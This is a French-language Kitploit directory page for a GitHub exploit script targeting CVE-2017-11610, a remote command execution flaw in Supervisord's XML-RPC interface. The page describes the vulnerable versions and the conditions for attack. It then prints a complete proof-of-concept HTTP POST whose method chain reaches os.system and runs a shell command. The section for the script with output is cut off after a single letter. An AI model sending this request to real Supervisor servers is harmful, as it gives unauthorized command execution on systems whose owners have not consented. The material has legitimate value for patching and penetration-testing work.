Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-11610 — Supervisord远程命令执行漏洞脚本 | Kitploit
Outils/GitHubGitHub/yaunsky/cve-2017-11610
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubyaunsky/cve-2017-11610

CVE-2017-11610

Supervisord远程命令执行漏洞脚本

Voir le dépôt
423il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Script d'exploitation de vulnérabilité d'exécution de commandes à distance dans Supervisord (CVE-2017-11610)

Présentation de la vulnérabilité

Supervisor est un outil de gestion de processus écrit en Python, permettant de démarrer, redémarrer (redémarrage automatique des programmes) et arrêter des processus (pas uniquement les processus Python) sur les systèmes de type UNIX (non pris en charge sous Windows).

Supervisor suit un modèle client‑serveur : supervisord est le côté serveur, supervisorctl le côté client. En résumé, le client envoie des instructions Supervisor qui invoquent l'API côté serveur pour effectuer certaines opérations.

Le service Web de Supervisor est souvent utilisé, agissant comme un client supervisord. Tant que la route est accessible, on peut effectuer à distance via la page Web des opérations similaires à celles du client supervisorctl. Ces opérations passent par l'interface XML‑RPC, et c'est précisément dans le traitement des données par cette interface que réside la vulnérabilité.

Conditions d'exploitation

Supervisor version 3.1.2 à 3.3.2

Service Web activé et port 9001 accessible

Mot de passe faible ou vide

POC

root@kitploit:~
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

Ce POC n'a pas de retour

Script avec retour

a

Télécharger l’outil